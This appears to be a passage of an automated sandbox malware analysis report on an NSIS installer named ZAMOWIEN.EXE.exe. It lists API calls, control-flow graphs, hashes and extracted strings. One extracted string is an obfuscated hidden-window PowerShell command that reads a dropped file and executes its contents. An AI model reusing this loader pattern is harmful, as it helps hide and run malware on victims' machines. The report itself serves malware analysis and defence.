                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID: C:\
                                                            • API String ID: 2295610775-3404278061
                                                            • Opcode ID: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                                            • Instruction ID: 6833435bd7c55ba6949cdbc3f534d3e11c9bb8cd8424a8444c2420f5768f04fc
                                                            • Opcode Fuzzy Hash: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                                            • Instruction Fuzzy Hash: E2D012719494205BC7441738ED0C8AF7A59DB5A3317204F32B4A9F12E0C3389D628AE9
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB9
                                                            • LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EC4
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00405ED5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                            • String ID:
                                                            • API String ID: 310444273-0
                                                            • Opcode ID: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                                            • Instruction ID: 12aa124b33c0948ddb41e5fcbe9811a0bcf46c48a2c09d507a8af2750e30391c
                                                            • Opcode Fuzzy Hash: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                                            • Instruction Fuzzy Hash: BAE08C32A04611ABC6219B209E0896B77ACEA88A41301497EF945F6151D734AC119BBA

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 163 4039b9-4039cb 164 4039d1-4039d7 163->164 165 403b0c-403b1b 163->165 164->165 166 4039dd-4039e6 164->166 167 403b6a-403b7f 165->167 168 403b1d-403b65 GetDlgItem * 2 call 403e8c SetClassLongA call 40140b 165->168 171 4039e8-4039f5 SetWindowPos 166->171 172 4039fb-4039fe 166->172 169 403b81-403b84 167->169 170 403bbf-403bc4 call 403ed8 167->170 168->167 174 403b86-403b91 call 401389 169->174 175 403bb7-403bb9 169->175 182 403bc9-403be4 170->182 171->172 177 403a00-403a12 ShowWindow 172->177 178 403a18-403a1e 172->178 174->175 196 403b93-403bb2 SendMessageA 174->196 175->170 181 403e59 175->181 177->178 183 403a20-403a35 DestroyWindow 178->183 184 403a3a-403a3d 178->184 193 403e5b-403e62 181->193 191 403be6-403be8 call 40140b 182->191 192 403bed-403bf3 182->192 186 403e36-403e3c 183->186 188 403a50-403a56 184->188 189 403a3f-403a4b SetWindowLongA 184->189 186->181 197 403e3e-403e44 186->197 194 403af9-403b07 call 403ef3 188->194 195 403a5c-403a6d GetDlgItem 188->195 189->193 191->192 199 403e17-403e30 DestroyWindow KiUserCallbackDispatcher 192->199 200 403bf9-403c04 192->200 194->193 201 403a8c-403a8f 195->201 202 403a6f-403a86 SendMessageA IsWindowEnabled 195->202 196->193 197->181 204 403e46-403e4f ShowWindow 197->204 199->186 200->199 205 403c0a-403c57 call 405b9e call 403e8c * 3 GetDlgItem 200->205 207 403a91-403a92 201->207 208 403a94-403a97 201->208 202->181 202->201 204->181 233 403c61-403c9d ShowWindow KiUserCallbackDispatcher call 403eae EnableWindow 205->233 234 403c59-403c5e 205->234 211 403ac2-403ac7 call 403e65 207->211 212 403aa5-403aaa 208->212 213 403a99-403a9f 208->213 211->194 216 403ae0-403af3 SendMessageA 212->216 218 403aac-403ab2 212->218 213->216 217 403aa1-403aa3 213->217 216->194 217->211 221 403ab4-403aba call 40140b 218->221 222 403ac9-403ad2 call 40140b 218->222 231 403ac0 221->231 222->194 230 403ad4-403ade 222->230 230->231 231->211 237 403ca2 233->237 238 403c9f-403ca0 233->238 234->233 239 403ca4-403cd2 GetSystemMenu EnableMenuItem SendMessageA 237->239 238->239 240 403cd4-403ce5 SendMessageA 239->240 241 403ce7 239->241 242 403ced-403d26 call 403ec1 call 405b7c lstrlenA call 405b9e SetWindowTextA call 401389 240->242 241->242 242->182 251 403d2c-403d2e 242->251 251->182 252 403d34-403d38 251->252 253 403d57-403d6b DestroyWindow 252->253 254 403d3a-403d40 252->254 253->186 255 403d71-403d9e CreateDialogParamA 253->255 254->181 256 403d46-403d4c 254->256 255->186 257 403da4-403dfb call 403e8c GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 255->257 256->182 258 403d52 256->258 257->181 263 403dfd-403e10 ShowWindow call 403ed8 257->263 258->181 265 403e15 263->265 265->186
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039F5
                                                            • ShowWindow.USER32(?), ref: 00403A12
                                                            • DestroyWindow.USER32 ref: 00403A26
                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A42
                                                            • GetDlgItem.USER32(?,?), ref: 00403A63
                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A77
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403A7E
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403B2C
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403B36
                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403B50
                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403BA1
                                                            • GetDlgItem.USER32(?,00000003), ref: 00403C47
                                                            • ShowWindow.USER32(00000000,?), ref: 00403C68
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C7A
                                                            • EnableWindow.USER32(?,?), ref: 00403C95
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CAB
                                                            • EnableMenuItem.USER32(00000000), ref: 00403CB2
                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CCA
                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CDD
                                                            • lstrlenA.KERNEL32(folketingssamlingerne Setup: Completed,?,folketingssamlingerne Setup: Completed,007A1F00), ref: 00403D06
                                                            • SetWindowTextA.USER32(?,folketingssamlingerne Setup: Completed), ref: 00403D15
                                                            • ShowWindow.USER32(?,0000000A), ref: 00403E49
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: folketingssamlingerne Setup: Completed
                                                            • API String ID: 3282139019-1294246636
                                                            • Opcode ID: 970beeaac23c8633fb5c8749f33691ff08c4e168514ade4d40dcbde5a61c2603
                                                            • Instruction ID: e60f831e91f574596bba605afa47ae8b2d4b4441763b235232076e0cc55ea590
                                                            • Opcode Fuzzy Hash: 970beeaac23c8633fb5c8749f33691ff08c4e168514ade4d40dcbde5a61c2603
                                                            • Instruction Fuzzy Hash: FBC1C271904200BBEB21AF61ED45E2B3EACFB46706F04453EF641B11E1C77DA9429B6E

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 266 403627-40363f call 405ea7 269 403641-403651 call 405ada 266->269 270 403653-403684 call 405a63 266->270 278 4036a7-4036d0 call 4038ec call 405717 269->278 274 403686-403697 call 405a63 270->274 275 40369c-4036a2 lstrcatA 270->275 274->275 275->278 284 4036d6-4036db 278->284 285 403757-40375f call 405717 278->285 284->285 286 4036dd-4036f5 call 405a63 284->286 291 403761-403768 call 405b9e 285->291 292 40376d-403792 LoadImageA 285->292 290 4036fa-403701 286->290 290->285 295 403703-403705 290->295 291->292 293 403813-40381b call 40140b 292->293 294 403794-4037c4 RegisterClassA 292->294 309 403825-403830 call 4038ec 293->309 310 40381d-403820 293->310 297 4038e2 294->297 298 4037ca-40380e SystemParametersInfoA CreateWindowExA 294->298 300 403716-403722 lstrlenA 295->300 301 403707-403714 call 405654 295->301 305 4038e4-4038eb 297->305 298->293 302 403724-403732 lstrcmpiA 300->302 303 40374a-403752 call 405629 call 405b7c 300->303 301->300 302->303 308 403734-40373e GetFileAttributesA 302->308 303->285 312 403740-403742 308->312 313 403744-403745 call 405670 308->313 319 403836-403853 ShowWindow LoadLibraryA 309->319 320 4038b9-4038ba call 404f5b 309->320 310->305 312->303 312->313 313->303 322 403855-40385a LoadLibraryA 319->322 323 40385c-40386e GetClassInfoA 319->323 324 4038bf-4038c1 320->324 322->323 325 403870-403880 GetClassInfoA RegisterClassA 323->325 326 403886-4038a9 DialogBoxParamA call 40140b 323->326 327 4038c3-4038c9 324->327 328 4038db-4038dd call 40140b 324->328 325->326 330 4038ae-4038b7 call 403577 326->330 327->310 331 4038cf-4038d6 call 40140b 327->331 328->297 330->305 331->310
                                                            APIs
                                                              • Part of subcall function 00405EA7: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB9
                                                              • Part of subcall function 00405EA7: LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EC4
                                                              • Part of subcall function 00405EA7: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED5
                                                            • lstrcatA.KERNEL32(1033,folketingssamlingerne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,folketingssamlingerne Setup: Completed,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\,771B3410,"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe",00000000), ref: 004036A2
                                                            • lstrlenA.KERNEL32(007A16A0,?,?,?,007A16A0,00000000,C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings,1033,folketingssamlingerne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,folketingssamlingerne Setup: Completed,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\), ref: 00403717
                                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 0040372A
                                                            • GetFileAttributesA.KERNEL32(007A16A0), ref: 00403735
                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings), ref: 0040377E
                                                              • Part of subcall function 00405ADA: wsprintfA.USER32 ref: 00405AE7
                                                            • RegisterClassA.USER32(007A1EA0), ref: 004037BB
                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037D3
                                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403808
                                                            • ShowWindow.USER32(00000005,00000000), ref: 0040383E
                                                            • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040384F
                                                            • LoadLibraryA.KERNEL32(RichEd32), ref: 0040385A
                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,007A1EA0), ref: 0040386A
                                                            • GetClassInfoA.USER32(00000000,RichEdit,007A1EA0), ref: 00403877
                                                            • RegisterClassA.USER32(007A1EA0), ref: 00403880
                                                            • DialogBoxParamA.USER32(?,00000000,004039B9,00000000), ref: 0040389F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: Completed$"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$folketingssamlingerne Setup: Completed
                                                            • API String ID: 914957316-606446835
                                                            • Opcode ID: f5dae8eb0386459ed527d59f92d7dcebc630e360c9ecd2f96a952aeb015378f9
                                                            • Instruction ID: 5a8f3a480c3ff0a7316bfe3ed3e84a823a8107e4b5d9873dcf131b1b59b1fd9f
                                                            • Opcode Fuzzy Hash: f5dae8eb0386459ed527d59f92d7dcebc630e360c9ecd2f96a952aeb015378f9
                                                            • Instruction Fuzzy Hash: E761D5715442406EE710BB659C85F373AACD78575AF00857EFA05B22E2C67DAD018A2D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 337 402c33-402c81 GetTickCount GetModuleFileNameA call 40582a 340 402c83-402c88 337->340 341 402c8d-402cbb call 405b7c call 405670 call 405b7c GetFileSize 337->341 342 402e65-402e69 340->342 349 402cc1 341->349 350 402da8-402db6 call 402bcf 341->350 352 402cc6-402cdd 349->352 356 402db8-402dbb 350->356 357 402e0b-402e10 350->357 354 402ce1-402ce3 call 403072 352->354 355 402cdf 352->355 361 402ce8-402cea 354->361 355->354 359 402dbd-402dce call 4030a4 call 403072 356->359 360 402ddf-402e09 GlobalAlloc call 4030a4 call 402e6c 356->360 357->342 382 402dd3-402dd5 359->382 360->357 386 402e1c-402e2d 360->386 364 402cf0-402cf7 361->364 365 402e12-402e1a call 402bcf 361->365 366 402d73-402d77 364->366 367 402cf9-402d0d call 4057e5 364->367 365->357 374 402d81-402d87 366->374 375 402d79-402d80 call 402bcf 366->375 367->374 384 402d0f-402d16 367->384 377 402d96-402da0 374->377 378 402d89-402d93 call 405f19 374->378 375->374 377->352 385 402da6 377->385 378->377 382->357 388 402dd7-402ddd 382->388 384->374 390 402d18-402d1f 384->390 385->350 391 402e35-402e3a 386->391 392 402e2f 386->392 388->357 388->360 390->374 393 402d21-402d28 390->393 394 402e3b-402e41 391->394 392->391 393->374 395 402d2a-402d31 393->395 394->394 396 402e43-402e5e SetFilePointer call 4057e5 394->396 395->374 397 402d33-402d53 395->397 400 402e63 396->400 397->357 399 402d59-402d5d 397->399 401 402d65-402d6d 399->401 402 402d5f-402d63 399->402 400->342 401->374 403 402d6f-402d71 401->403 402->385 402->401 403->374
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00402C44
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,00000400), ref: 00402C60
                                                              • Part of subcall function 0040582A: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,80000000,00000003), ref: 0040582E
                                                              • Part of subcall function 0040582A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405850
                                                            • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,80000000,00000003), ref: 00402CAC
                                                            Strings
                                                            • C:\Users\user\Desktop, xrefs: 00402C8E, 00402C93, 00402C99
                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                                            • C:\Users\user\Desktop\ZAMOWIEN.EXE.exe, xrefs: 00402C4A, 00402C59, 00402C6D, 00402C8D
                                                            • Null, xrefs: 00402D2A
                                                            • soft, xrefs: 00402D21
                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C3D
                                                            • Inst, xrefs: 00402D18
                                                            • Error launching installer, xrefs: 00402C83
                                                            • "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe", xrefs: 00402C33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                            • String ID: "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ZAMOWIEN.EXE.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                            • API String ID: 4283519449-3753536591
                                                            • Opcode ID: 075cbcb6e4dc5bdfd243b1fe7f182227752b4d6a0886aeac11b61c25858b0141
                                                            • Instruction ID: 67f90bf762a0a8549ff8da05f1705a54a2dc0587b06dee9d11c49c0032f29009
                                                            • Opcode Fuzzy Hash: 075cbcb6e4dc5bdfd243b1fe7f182227752b4d6a0886aeac11b61c25858b0141
                                                            • Instruction Fuzzy Hash: 18510671D00204ABDB209F65DE89B6E7BA8EF44314F14403BFA04B62D1C7BC9E418BAD

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 535 40173f-401762 call 402a07 call 405696 540 401764-40176a call 405b7c 535->540 541 40176c-40177e call 405b7c call 405629 lstrcatA 535->541 546 401783-401789 call 405de7 540->546 541->546 551 40178e-401792 546->551 552 401794-40179e call 405e80 551->552 553 4017c5-4017c8 551->553 560 4017b0-4017c2 552->560 561 4017a0-4017ae CompareFileTime 552->561 555 4017d0-4017ec call 40582a 553->555 556 4017ca-4017cb call 405805 553->556 563 401864-40188d call 404e89 call 402e6c 555->563 564 4017ee-4017f1 555->564 556->555 560->553 561->560 577 401895-4018a1 SetFileTime 563->577 578 40188f-401893 563->578 566 4017f3-401835 call 405b7c * 2 call 405b9e call 405b7c call 4053ad 564->566 567 401846-401850 call 404e89 564->567 566->551 598 40183b-40183c 566->598 579 401859-40185f 567->579 582 4018a7-4018b2 CloseHandle 577->582 578->577 578->582 580 4028a5 579->580 583 4028a7-4028ab 580->583 585 4018b8-4018bb 582->585 586 40289c-40289f 582->586 588 4018d0-4018d3 call 405b9e 585->588 589 4018bd-4018ce call 405b9e lstrcatA 585->589 586->580 595 4018d8-402229 call 4053ad 588->595 589->595 595->583 598->579 600 40183e-40183f 598->600 600->567
                                                            APIs
                                                            • lstrcatA.KERNEL32(00000000,00000000,open,C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings,00000000,00000000,00000031), ref: 0040177E
                                                            • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings,00000000,00000000,00000031), ref: 004017A8
                                                              • Part of subcall function 00405B7C: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B89
                                                              • Part of subcall function 00404E89: lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                              • Part of subcall function 00404E89: lstrlenA.KERNEL32(00402FA6,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                              • Part of subcall function 00404E89: lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00402FA6,00402FA6,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8), ref: 00404EE5
                                                              • Part of subcall function 00404E89: SetWindowTextA.USER32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\), ref: 00404EF7
                                                              • Part of subcall function 00404E89: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                              • Part of subcall function 00404E89: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                              • Part of subcall function 00404E89: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"$-windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"$C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings$open$open "powershell.exe"
                                                            • API String ID: 1941528284-583747682
                                                            • Opcode ID: af2016b80886e88f71367c54807c5b12a6f461fc567e142ad39cf1552a84a68b
                                                            • Instruction ID: 03788365e3babcef373fd792483c9ded1d717f2a290d89539055341019bd814b
                                                            • Opcode Fuzzy Hash: af2016b80886e88f71367c54807c5b12a6f461fc567e142ad39cf1552a84a68b
                                                            • Instruction Fuzzy Hash: EC41E771900619BACB10BBA5CC46DAF3979DF46368B20423FF512F10E2D63C9A418A6D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
